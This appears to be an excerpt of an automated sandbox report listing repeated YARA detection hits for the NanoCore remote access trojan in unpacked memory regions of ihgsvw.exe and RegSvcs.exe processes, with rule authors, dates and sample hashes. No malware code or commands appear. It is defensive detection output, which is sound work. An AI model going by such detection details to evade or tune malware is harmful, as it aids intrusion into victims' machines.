      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
